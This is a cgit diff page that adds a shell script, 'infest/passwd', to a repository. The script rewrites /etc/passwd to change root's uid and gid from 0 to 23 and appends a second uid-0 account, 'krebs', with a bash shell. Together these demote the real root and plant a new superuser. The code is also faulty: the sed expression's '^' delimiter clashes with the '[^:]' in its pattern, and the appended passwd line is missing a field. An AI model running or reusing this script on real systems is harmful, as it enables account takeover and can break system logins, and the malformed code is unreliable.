summaryrefslogtreecommitdiffstats
path: root/infest/passwd
diff options
context:
space:
mode:
Diffstat (limited to 'infest/passwd')
-rwxr-xr-xinfest/passwd11
1 files changed, 11 insertions, 0 deletions
diff --git a/infest/passwd b/infest/passwd
new file mode 100755
index 00000000..090840bf
--- /dev/null
+++ b/infest/passwd
@@ -0,0 +1,11 @@
+#! /bin/sh
+
+f=/etc/passwd
+
+sed -ri 's^(root:[^:]+):0:0:(.*)$\1:23:23:\2' $f
+
+x='krebs:x:0:0:/krebs:/bin/bash'
+if ! fgrep -q $x $f; then
+ echo $x >>$f
+fi
+